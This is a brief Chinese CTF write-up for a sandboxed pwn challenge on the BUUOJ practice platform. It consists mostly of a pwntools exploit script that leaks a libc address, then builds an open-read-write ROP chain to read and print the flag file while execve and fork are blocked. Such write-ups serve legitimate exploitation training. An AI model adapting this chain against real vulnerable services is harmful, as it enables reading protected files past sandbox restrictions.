利用思路
沙盒,禁止了execve和fork syscall,所以不能打开子进程,需要在当前进程里读入flag并输出,利用 orw 打印flag
exp 脚本
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
p = remote(\'node3.buuoj.cn\',29892)
p.recvuntil("0x")
puts_addr=int(p.recv(12),16)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libcbase_addr=puts_addr-libc.symbols[\'puts\']
#mov_rdi_rsi_ret=libcbase_addr+libc.search(asm("mov rdi,r13\nret")).next()
pop_rdi_ret=libcbase_addr+0x21102
pop_rsi_ret=libcbase_addr+0x202e8
pop_rdx_ret=libcbase_addr+0x1b92
open_addr=libcbase_addr+libc.symbols[\'open\']
free_hook=libcbase_addr+libc.symbols[\'__free_hook\']
read_addr=libcbase_addr+libc.symbols[\'read\']
puts_addr=libcbase_addr+libc.symbols[\'puts\']
payload=p64(0)+p64(pop_rsi_ret)+p64(free_hook)+p64(pop_rdx_ret)+p64(4)+p64(read_addr)
payload+=p64(pop_rdi_ret)+p64(free_hook)+p64(pop_rsi_ret)+p64(4)+p64(open_addr)
payload+=p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(free_hook)+p64(pop_rdx_ret)+p64(0x30)+p64(read_addr)
payload+=p64(pop_rdi_ret)+p64(free_hook)+p64(puts_addr)
p.sendafter("Input something: ",payload)
p.sendafter("What\'s your name?",\'a\'* 0x78+p64(pop_rdi_ret))
p.send("flag")
p.interactive()